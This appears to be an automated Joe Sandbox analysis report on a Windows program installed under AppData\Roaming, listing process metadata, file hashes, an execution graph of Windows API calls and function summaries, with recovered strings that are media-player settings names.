                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                Start time:12:03:20
                                                                                                                                                                                                Start date:05/01/2025
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:846'325'235 bytes
                                                                                                                                                                                                MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:6.6%
                                                                                                                                                                                                  Total number of Nodes:274
                                                                                                                                                                                                  Total number of Limit Nodes:13
                                                                                                                                                                                                  execution_graph 39141 4b9138 39142 4b9143 ctype 39141->39142 39148 4c739c SetErrorMode SetErrorMode 39142->39148 39145 4b917f 39149 4c73b3 ctype 39148->39149 39150 4b9162 39149->39150 39192 4b60c0 39149->39192 39150->39145 39152 4011cf 39150->39152 39160 403aad __EH_prolog 39150->39160 39196 41d612 39152->39196 39154 4011da 39203 40122b 39154->39203 39156 4011e8 ctype 39157 4011ed LoadCursorW 39156->39157 39214 41b548 RegOpenKeyExW 39157->39214 39161 403ac3 39160->39161 39227 404245 __EH_prolog 39161->39227 39163 403ad7 39164 4011cf 19 API calls 39163->39164 39165 403af1 39164->39165 39166 403bad 39165->39166 39229 401659 __EH_prolog 39165->39229 39323 404298 __EH_prolog __EH_prolog __EH_prolog ctype 39166->39323 39169 403c33 39169->39145 39172 403b15 39172->39166 39315 4bc7d1 __EH_prolog 39172->39315 39174 403b69 39316 4c5d9a GlobalAddAtomW GlobalAddAtomW 39174->39316 39176 403b70 39317 4040e4 57 API calls 39176->39317 39178 403b9e 39179 403ba2 39178->39179 39180 403baf 39178->39180 39318 4c5605 __EH_prolog 39179->39318 39319 4b57a7 ShowWindow 39180->39319 39183 403bba UpdateWindow 39320 4b54d9 DragAcceptFiles 39183->39320 39185 403bd0 39321 4b57a7 ShowWindow 39185->39321 39187 403beb PostMessageW 39188 403c18 39187->39188 39189 403c08 PostMessageW 39187->39189 39322 4c5605 __EH_prolog 39188->39322 39189->39188 39191 403c23 39191->39166 39193 4b60c5 ctype 39192->39193 39194 4b60d1 GetCurrentThreadId SetWindowsHookExW 39193->39194 39195 4b60fb ctype 39193->39195 39194->39195 39195->39150 39197 496de0 39196->39197 39198 41d622 GetVersionExW 39197->39198 39199 41d650 39198->39199 39200 41d64b 39198->39200 39220 41d66e GetModuleHandleW GetProcAddress GetCurrentProcess 39199->39220 39200->39154 39202 41d657 39202->39154 39204 40123e CreateFontIndirectW 39203->39204 39225 4012b4 GetStockObject GetStockObject GetObjectW 39203->39225 39221 4b9a47 39204->39221 39207 401256 CreateFontIndirectW 39208 4b9a47 2 API calls 39207->39208 39209 40126c CreateFontIndirectW 39208->39209 39210 4b9a47 2 API calls 39209->39210 39211 401289 CreateFontIndirectW 39210->39211 39212 4b9a47 2 API calls 39211->39212 39213 4012ad 39212->39213 39213->39156 39215 41b5b4 RegCloseKey 39214->39215 39216 41b576 RegOpenKeyExW 39214->39216 39217 401207 39215->39217 39216->39215 39218 41b589 RegOpenKeyExW 39216->39218 39217->39145 39218->39215 39219 41b5a1 RegOpenKeyExW 39218->39219 39219->39215 39219->39217 39220->39202 39222 4b9a57 39221->39222 39224 4b9a53 39221->39224 39226 4b99c0 __EH_prolog __EH_prolog ctype 39222->39226 39224->39207 39225->39204 39226->39224 39228 40425b 39227->39228 39228->39163 39324 4c4d62 39229->39324 39232 4c4d62 10 API calls 39233 401698 39232->39233 39234 4c4d62 10 API calls 39233->39234 39235 4016ab 39234->39235 39236 4c4d62 10 API calls 39235->39236 39237 4016be 39236->39237 39238 4c4d62 10 API calls 39237->39238 39239 4016d1 39238->39239 39240 4c4d62 10 API calls 39239->39240 39241 4016e4 39240->39241 39242 4c4d62 10 API calls 39241->39242 39243 4016f7 39242->39243 39244 4c4d62 10 API calls 39243->39244 39245 40170a 39244->39245 39246 4c4d62 10 API calls 39245->39246 39247 40171d 39246->39247 39248 4c4d62 10 API calls 39247->39248 39249 401730 39248->39249 39250 4c4d62 10 API calls 39249->39250 39251 401743 39250->39251 39252 4c4d62 10 API calls 39251->39252 39253 401756 39252->39253 39254 4c4d62 10 API calls 39253->39254 39255 401769 39254->39255 39256 4c4d62 10 API calls 39255->39256 39257 40177c 39256->39257 39258 4c4d62 10 API calls 39257->39258 39259 40178f 39258->39259 39260 4c4d62 10 API calls 39259->39260 39261 4017a2 39260->39261 39262 4c4d62 10 API calls 39261->39262 39263 4017b5 39262->39263 39264 4c4d62 10 API calls 39263->39264 39265 4017c8 39264->39265 39266 4c4d62 10 API calls 39265->39266 39267 4017db 39266->39267 39268 4c4d62 10 API calls 39267->39268 39269 401815 39268->39269 39270 4c4d62 10 API calls 39269->39270 39271 40182e 39270->39271 39272 4c4d62 10 API calls 39271->39272 39273 401847 39272->39273 39274 4c4d62 10 API calls 39273->39274 39275 40185d 39274->39275 39276 4c4d62 10 API calls 39275->39276 39277 401870 39276->39277 39278 4c4d62 10 API calls 39277->39278 39279 401883 39278->39279 39280 4c4d62 10 API calls 39279->39280 39281 401899 39280->39281 39282 4c4d62 10 API calls 39281->39282 39283 4018b2 39282->39283 39284 4c4d62 10 API calls 39283->39284 39285 4018cb 39284->39285 39286 4c4d62 10 API calls 39285->39286 39287 4018e1 39286->39287 39288 4c4d62 10 API calls 39287->39288 39289 4018f7 39288->39289 39290 4c4d62 10 API calls 39289->39290 39291 401910 39290->39291 39292 4c4d62 10 API calls 39291->39292 39293 40195c 39292->39293 39294 4c4d62 10 API calls 39293->39294 39295 401975 39294->39295 39296 4c4d62 10 API calls 39295->39296 39297 40198e 39296->39297 39331 4c4dce __EH_prolog 39297->39331 39299 4019a7 39302 4019da 39299->39302 39346 41d3fd SHGetSpecialFolderPathW 39299->39346 39301 4c4d62 10 API calls 39303 401a0e 39301->39303 39302->39301 39304 4c4dce 13 API calls 39303->39304 39305 401a27 39304->39305 39312 401a5b 39305->39312 39348 41f164 __EH_prolog SHGetSpecialFolderPathW 39305->39348 39306 4c4d62 10 API calls 39308 401aae 39306->39308 39309 4c4d62 10 API calls 39308->39309 39310 401ac7 39309->39310 39311 4c4d62 10 API calls 39310->39311 39313 401ae6 39311->39313 39312->39306 39313->39166 39314 40d051 44 API calls 39313->39314 39314->39172 39315->39174 39316->39176 39317->39178 39318->39166 39319->39183 39320->39185 39321->39187 39322->39191 39323->39169 39325 4c4d6e 39324->39325 39326 4c4db4 GetPrivateProfileIntW 39324->39326 39357 4c4d1c 39325->39357 39328 401685 39326->39328 39328->39232 39330 4c4d81 RegQueryValueExW RegCloseKey 39330->39328 39332 4c4de2 39331->39332 39333 4c4e94 GetPrivateProfileStringW 39332->39333 39334 4c4df1 39332->39334 39339 4c4e00 39333->39339 39335 4c4d1c 7 API calls 39334->39335 39337 4c4df9 39335->39337 39338 4c4e08 RegQueryValueExW 39337->39338 39337->39339 39340 4c4e5e RegCloseKey 39338->39340 39341 4c4e32 39338->39341 39339->39299 39340->39339 39342 4c4e6d 39340->39342 39343 4c4e44 RegQueryValueExW 39341->39343 39370 4b1c93 InterlockedIncrement 39342->39370 39345 4b23bb 39343->39345 39345->39340 39347 41d446 39346->39347 39347->39302 39349 41f1a8 39348->39349 39350 41f1b6 39348->39350 39349->39312 39371 4af857 39350->39371 39352 41f1e9 39374 41d32d 6 API calls 39352->39374 39354 41f1f1 39375 4b1c93 InterlockedIncrement 39354->39375 39356 41f200 39356->39349 39362 4c4c88 RegOpenKeyExW 39357->39362 39360 4c4d37 RegCreateKeyExW RegCloseKey 39361 4c4d33 39360->39361 39361->39328 39361->39330 39363 4c4cfa 39362->39363 39364 4c4cc0 RegCreateKeyExW 39362->39364 39366 4c4d0a 39363->39366 39367 4c4d05 RegCloseKey 39363->39367 39364->39363 39365 4c4cdf RegCreateKeyExW 39364->39365 39365->39363 39368 4c4d0f RegCloseKey 39366->39368 39369 4c4d14 39366->39369 39367->39366 39368->39369 39369->39360 39369->39361 39370->39339 39376 4af51f 39371->39376 39373 4af869 39373->39352 39374->39354 39375->39356 39381 4af538 39376->39381 39377 4af827 39384 49b09d 39377->39384 39379 49812d WideCharToMultiByte 39379->39381 39380 4af841 39380->39373 39381->39377 39381->39379 39382 4af758 lstrlenA 39381->39382 39383 4af6ff lstrlenW 39381->39383 39382->39381 39383->39381 39387 4a4a25 39384->39387 39386 49b0ca 39386->39380 39388 4a5192 39387->39388 39391 4a4a4f 39387->39391 39388->39386 39389 4a51ba 13 API calls 39389->39391 39390 4a8057 8 API calls 39390->39391 39391->39388 39391->39389 39391->39390 39392 4a51da 13 API calls 39391->39392 39393 4a520b 13 API calls 39391->39393 39394 4a4ff3 __aullrem __aulldiv 39391->39394 39392->39391 39393->39391 39394->39391 39395 49768f 39396 4976b8 39395->39396 39398 497696 39395->39398 39398->39396 39399 4976bb 39398->39399 39400 4976e8 39399->39400 39401 49772b 39399->39401 39406 4976fe 39400->39406 39407 49d76c InitializeCriticalSection EnterCriticalSection LeaveCriticalSection ctype 39400->39407 39401->39406 39408 49d76c InitializeCriticalSection EnterCriticalSection LeaveCriticalSection ctype 39401->39408 39403 49779a RtlAllocateHeap 39404 49771d 39403->39404 39404->39398 39406->39403 39406->39404 39407->39406 39408->39406 39409 4c6214 EnterCriticalSection 39414 4c6233 39409->39414 39410 4c62ef 39413 4c6304 LeaveCriticalSection 39410->39413 39411 4c626d GlobalAlloc 39415 4c62a2 39411->39415 39412 4c6280 GlobalHandle GlobalUnlock GlobalReAlloc 39412->39415 39414->39410 39414->39411 39414->39412 39416 4c62cb GlobalLock 39415->39416 39417 4c62b0 GlobalHandle GlobalLock LeaveCriticalSection 39415->39417 39416->39410 39418 4aff38 39417->39418 39418->39416 39419 4a5f61 39420 4a5f6c 39419->39420 39421 4a613a HeapCreate 39420->39421 39422 4a6191 39421->39422 39423 4a64e2 HeapAlloc 39422->39423 39424 4a64fa 39423->39424 39437 4a9884 GetLastError 39424->39437 39426 4a689c 39438 4a9884 GetLastError 39426->39438 39428 4a68ac 39439 4a9884 GetLastError 39428->39439 39430 4a68bc 39440 4a9884 GetLastError 39430->39440 39432 4a68cf 39441 4a9884 GetLastError 39432->39441 39434 4a68df 39442 4a9884 GetLastError 39434->39442 39436 4a68ef 39437->39426 39438->39428 39439->39430 39440->39432 39441->39434 39442->39436 39443 49cb65 HeapCreate 39444 49cbbb 39443->39444 39445 49cb85 39443->39445 39450 49ca1d 7 API calls 39445->39450 39447 49cbbe 39448 49cb8a 39448->39447 39449 49cbaf HeapDestroy 39448->39449 39449->39444 39450->39448 39451 4c5fe3 39452 4c6055 GetVersion 39451->39452 39453 4c60a8 39452->39453 39454 4c6096 GetProcessVersion 39452->39454 39458 4b7489 KiUserCallbackDispatcher GetSystemMetrics 39453->39458 39454->39453 39456 4c60af 39457 4c60b9 LoadCursorW LoadCursorW 39456->39457 39459 4b74a8 39458->39459 39460 4b74b4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 39459->39460 39460->39456 39461 40e4bf 39464 40e4c9 39461->39464 39463 40e4c4 39465 40e4e9 __EH_prolog 39464->39465 39466 40e51b 39465->39466 39467 40e50e SHGetMalloc 39465->39467 39468 40e548 39466->39468 39469 40e53b SHGetDesktopFolder 39466->39469 39467->39466 39468->39463 39469->39468

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 004C5FE3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 379 4c5fe3-4c6094 GetVersion 381 4c60a8-4c60aa call 4b7489 379->381 382 4c6096-4c60a5 GetProcessVersion 379->382 384 4c60af-4c60ef call 4b7445 LoadCursorW * 2 381->384 382->381
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetVersion.KERNEL32(?,?,?,004C5FDE), ref: 004C605A
                                                                                                                                                                                                  • GetProcessVersion.KERNEL32(00000000,?,?,?,004C5FDE), ref: 004C6097
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004C60C5
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004C60D0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CursorLoadVersion$Process
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2246821583-0
                                                                                                                                                                                                  • Opcode ID: 60f7202580f2663633a494bb1ec0babd64db65b049d7bf1b2cc6d5fc99b77a95
                                                                                                                                                                                                  • Instruction ID: d78db7dd0d912b12f1fe85bbb0494cb5f2310ef2ecf86bacd0b069ba0e86ffb7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60f7202580f2663633a494bb1ec0babd64db65b049d7bf1b2cc6d5fc99b77a95
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41118CB1A00B508FD768DF3A988462ABBE5FB887057004D3FE18BC6B90DB78A4408B54
                                                                                                                                                                                                  Function 004A5D16 Relevance: 3.8, APIs: 2, Instructions: 821memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 419 4a5d16-4a5d18 420 4a5cdb-4a5cef 419->420 421 4a5d19-4a5d50 419->421 423 4a5cfa-4a5d07 420->423 424 4a5cf5 call 4a4823 420->424 421->421 422 4a5d52-4a5e21 call 41b9e6 call 44037e call 45f759 421->422 426 4a5d09-4a5d0f 423->426 427 4a5cd3-4a5cf5 call 491b99 call 4a4823 423->427 424->423 430 4a5d11 426->430 431 4a5d14 426->431 427->423 430->431 431->421
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapCreate.KERNEL32(-E2BD30C2,00055366,?,0049CB0B,?,?), ref: 004A614C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00055366,?,0049CB0B,?,?), ref: 004A64E9
                                                                                                                                                                                                    • Part of subcall function 004A9884: GetLastError.KERNEL32(?,?,00000000,?,-013E2724), ref: 004A98C0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$AllocCreateErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2156799573-0
                                                                                                                                                                                                  • Opcode ID: 795dd87e86002a371792873de4a74f1b81161130372880f1d95a1de53402c62f
                                                                                                                                                                                                  • Instruction ID: 082bb82959f259d3d16de41f8527c22331040bf8f012e4f480dcc6dd5df9e648
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 795dd87e86002a371792873de4a74f1b81161130372880f1d95a1de53402c62f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 375217739047204FD358EFF6EC8656E3772F7E0318746822EE402C7165DE78544AAAE9
                                                                                                                                                                                                  Function 004A5EA0 Relevance: 3.7, APIs: 2, Instructions: 692memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapCreate.KERNEL32(-E2BD30C2,00055366,?,0049CB0B,?,?), ref: 004A614C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00055366,?,0049CB0B,?,?), ref: 004A64E9
                                                                                                                                                                                                    • Part of subcall function 004A9884: GetLastError.KERNEL32(?,?,00000000,?,-013E2724), ref: 004A98C0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$AllocCreateErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2156799573-0
                                                                                                                                                                                                  • Opcode ID: 807e867b25817d2ff2f44d596c330c4c170c3590e67355bbc25c147bf7db7703
                                                                                                                                                                                                  • Instruction ID: bdf96ef203550a441925e86ae714b29b44dd638f6a87e263d288e0c0efcea14a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 807e867b25817d2ff2f44d596c330c4c170c3590e67355bbc25c147bf7db7703
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F63219739047204FD358EFF6EC8656E3772F7E0318746862FE402C7466CE785449AAA9
                                                                                                                                                                                                  Function 004A5F61 Relevance: 3.6, APIs: 2, Instructions: 593memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapCreate.KERNEL32(-E2BD30C2,00055366,?,0049CB0B,?,?), ref: 004A614C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00055366,?,0049CB0B,?,?), ref: 004A64E9
                                                                                                                                                                                                    • Part of subcall function 004A9884: GetLastError.KERNEL32(?,?,00000000,?,-013E2724), ref: 004A98C0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$AllocCreateErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2156799573-0
                                                                                                                                                                                                  • Opcode ID: 1b6d00a56796ce0dfc1fa8ae3602dbb463cdd00d8c0227a23311f94d35e372c3
                                                                                                                                                                                                  • Instruction ID: 4f1b654e85b7b0b1c56600d288021e9e805cc4cce035a7ea2a02e82fd91e841b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b6d00a56796ce0dfc1fa8ae3602dbb463cdd00d8c0227a23311f94d35e372c3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 321209739047244FD348FFF6ED8606D3772FBF0318346862ED40297466CE78544AAAA9
                                                                                                                                                                                                  Function 00401659 Relevance: 73.8, APIs: 1, Strings: 41, Instructions: 338COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040165E
                                                                                                                                                                                                    • Part of subcall function 004C4D62: RegQueryValueExW.KERNEL32(00000000,?,00000000,?,?,?,00000001,?,?,?,?,?,0042AE61,Settings,LastLicenseCheck,00000000), ref: 004C4D9B
                                                                                                                                                                                                    • Part of subcall function 004C4D62: RegCloseKey.ADVAPI32(00000000,?,?,?,?,0042AE61,Settings,LastLicenseCheck,00000000,?), ref: 004C4DA4
                                                                                                                                                                                                    • Part of subcall function 004C4D62: GetPrivateProfileIntW.KERNEL32(?,?,00000000,?), ref: 004C4DC3
                                                                                                                                                                                                    • Part of subcall function 004C4DCE: __EH_prolog.LIBCMT ref: 004C4DD3
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                    • Part of subcall function 0041D3FD: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000000E,?), ref: 0041D431
                                                                                                                                                                                                    • Part of subcall function 004B206D: InterlockedIncrement.KERNEL32(-000000F4), ref: 004B20B0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prologInterlocked$CloseDecrementFolderIncrementPathPrivateProfileQuerySpecialValue
                                                                                                                                                                                                  • String ID: AllowDuplicates$AlwaysOnTop$AlwaysShowControlBar$AutoCheckUpdate$AutoCheckUpdateDays$AutoCloseApp$AutoResumeInterrupted$DropBox.Left$DropBox.Top$EscToExitFullScreenMode$FilterIndex$LastFolder$LastScanSubfolders$Layout$LoadLastPlaylist$MainWindow.Height$MainWindow.Left$MainWindow.Top$MainWindow.Width$MaxRecentFiles$MaxRecentPlaylists$Mute$PlaylistViewStyle$PreventScreenSaver$RememberPosition$RememberRecentFiles$RememberRecentPlaylists$Repeat$Settings$ShowDefinition$ShowDropBox$ShowDuration$ShowIcon$ShowTitle$TempFolder$Thumbnail.Time$ThumbnailG.Height$ThumbnailG.Width$Transparent$Volume$ZoomRatio
                                                                                                                                                                                                  • API String ID: 2878767568-943712644
                                                                                                                                                                                                  • Opcode ID: 5b8715d5fcb279e54465b9e9ff88d833064c53f492059a6ae729d8cdbf660d22
                                                                                                                                                                                                  • Instruction ID: 4b07b052448f71103e3e83c08f8219a5ad4cdd1294eb186797cf0cefae66d204
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b8715d5fcb279e54465b9e9ff88d833064c53f492059a6ae729d8cdbf660d22
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FC13074600740AED764BB338D51FABFAEAAF84704F504D1FB597926A2DB786800DB18
                                                                                                                                                                                                  Function 004C6214 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 120 4c6214-4c6231 EnterCriticalSection 121 4c6240-4c6245 120->121 122 4c6233-4c623a 120->122 123 4c6247-4c624a 121->123 124 4c6262-4c626b 121->124 122->121 125 4c62f9-4c62fc 122->125 126 4c624d-4c6250 123->126 127 4c626d-4c627e GlobalAlloc 124->127 128 4c6280-4c629c GlobalHandle GlobalUnlock GlobalReAlloc 124->128 129 4c62fe-4c6301 125->129 130 4c6304-4c6325 LeaveCriticalSection 125->130 131 4c625a-4c625c 126->131 132 4c6252-4c6258 126->132 133 4c62a2-4c62ae 127->133 128->133 129->130 131->124 131->125 132->126 132->131 134 4c62cb-4c62f8 GlobalLock call 496de0 133->134 135 4c62b0-4c62c6 GlobalHandle GlobalLock LeaveCriticalSection call 4aff38 133->135 134->125 135->134
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0050B060,005095E8,00000000,?,0050B044,0050B044,004C65AF,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000), ref: 004C6223
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002002,00000000,?,?,0050B044,0050B044,004C65AF,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000), ref: 004C6278
                                                                                                                                                                                                  • GlobalHandle.KERNEL32(007626E0), ref: 004C6281
